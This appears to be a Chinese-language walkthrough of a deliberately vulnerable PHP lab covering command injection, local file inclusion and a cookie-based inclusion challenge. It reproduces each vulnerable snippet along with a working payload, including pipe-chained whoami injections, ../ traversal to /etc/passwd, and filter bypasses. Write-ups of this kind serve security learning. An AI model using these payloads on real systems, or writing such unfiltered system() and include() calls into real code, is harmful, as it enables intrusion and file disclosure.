CMD-1
查看源代碼:
<?php
system($_GET["cmd"]);
?>
這個沒有任何過濾,直接命令執行即可。payload:
?cmd=whoani
CMD-2
這題和上面一樣,只不過改成了POST請求。
CMD-3
查看源碼:
<?php
system("/usr/bin/whois " . $_GET["domain"]);
?>
因為測試環境實在windows下,所以先把源碼中路徑改為nslookup。
這里需要退出nsookup命令,知識點:
- cmd1|cmd2:不論
cmd1是否為真,cmd2都會被執行;- cmd1;cmd2:不論
cmd1是否為真,cmd2都會被執行;- cmd1||cmd2:如果
cmd1為假,則執行cmd2;- cmd1&&cmd2:如果
cmd1為真,則執行cmd2;
所以構造payload:
domain=google.com|whoami
CMD-4
方法差不多,只是變成了POST請求。
CMD-5
查看源碼:
<?php
if (preg_match('/^[-a-z0-9]+\.a[cdefgilmnoqrstuwxz]|b[abdefghijmnorstvwyz]|c[acdfghiklmnoruvxyz]|d[ejkmoz]|e[cegrstu]|f[ijkmor]|g[abdefghilmnpqrstuwy]|h[kmnrtu]|i[delmnoqrst]|j[emop]|k[eghimnprwyz]|l[abcikrstuvy]|m[acdeghklmnopqrstuvwxyz]|n[acefgilopruz]|om|p[aefghklmnrstwy]|qa|r[eosuw]|s[abcdeghijklmnortuvyz]|t[cdfghjklmnoprtvwz]|u[agksyz]|v[aceginu]|w[fs]|y[et]|z[amw]|biz|cat|com|edu|gov|int|mil|net|org|pro|tel|aero|arpa|asia|coop|info|jobs|mobi|name|museum|travel|arpa|xn--[a-z0-9]+$/', strtolower($_GET["domain"])))
{ system("whois -h " . $_GET["server"] . " " . $_GET["domain"]); }
else
{echo "malformed domain name";}
?>
這里對domain進行了一大堆過濾,但是卻沒有對server進行過濾,所以直接對server進行構造。
域名查詢語句:
whois -h [server] [domain]
payload:
domain=facebook.com&server=127.0.0.1|whoami||
最后的拼接語句為:
whois -h 127.0.0.1|whoami|| facebook.com
這里就執行whoami,facebook.com也被忽略了。
CMD-6
方法和上題一樣,改成了POST請求。
LFI-1
查看源碼:
<?php
include($_GET["page"]);
?>
這里沒有過濾,且包含一個用戶輸入了的文件。payload:
page=C:/Windows/system.ini(windows)
age=/etc/passwd(Linux)
LFI-2
查看源碼:
<?php
include("includes/".$_GET['library'].".php");
?>
這里添加了要包含文件的上級路徑。這里補充一個小知識點:
../的意思是返回上次目錄
所以我們要跳出includes,那么就可以使用../跳出。payload:
library=../../../zx
這里可以使用%00截斷,也可以不使用,根據包含文件的類型判斷。
LFI-3
查看源碼:
<?php
if (substr($_GET['file'], -4, 4) != '.php')
echo file_get_contents($_GET['file']);
else
echo 'You are not allowed to see source files!'."\n";
?>
這里使用了substr()函數對傳入的值進行截取判斷,最后四位不能是.php。
這里繞過的方法有很多種:
- 大小寫繞過
- 背后加'.'
- 背后加空格
- 背后加'/.'
- 使用'.ph<'進行
.php拓展過濾滲出
LFI-4
查看源碼:
<?php
include('includes/class_'.addslashes($_GET['class']).'.php');
?>
這里的addslash()會對預定義字符進行轉義:
- 單引號
- 雙引號
- 反斜杠
- 0x00
也就是說不能使用00截斷(貌似也不需要?),payload和LFI-2一樣,不過返回的上級目錄會多一點。
LFI-5
查看源碼:
<?php
$file = str_replace('../', '', $_GET['file']);
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}
?>
這里使用了str_replace()對../進行了過濾,也就是說無法返回上級目錄了,但是因為相當於刪除操作,所以可以使用雙寫的方式進行繞過。payload:
file=..././..././..././zx.php
LFI-6-10
這幾道題就是之前五道題的POST方式。
LFI-11
查看源碼:
<form action="/LFI-11/index.php" method="POST">
<input type="text" name="file">
<input type="hidden" name="style" name="stylepath">
</form>
<?php include($_POST['stylepath']); ?>
這里用POST提交參數,但是不是通過文本框中提交,真正的用hidden隱藏起來了。所以我們需要通過火狐/burp進行POST請求。
LFI-12
這題和上題一樣,只不過是GET方式。
LFI-13
不知道為什么和LFI-5一樣。
LFI-14
和上題一樣,改成POST請求。
HDR-1
查看源碼:
<?php
$template = 'blue.php';
if ( array_key_exists( $_COOKIE['TEMPLATE'] ) )
$template = $_COOKIE['TEMPLATE'];
include ( dirname(FILE) . "/" . $template );
?>
array_key_exists(key,array):檢查某個數組中是否存在指定的鍵名,如果鍵名存在則返回 true,如果鍵名不存在則返回 false。如果指定數組的時候省略了鍵名,將會生成從 0 開始並且每個鍵值對應以 1 遞增的整數鍵名。
dirname(path):返回路徑中的目錄部分。
這道題在Cookie中傳值,可以通過返回上級目錄的方式進行包含。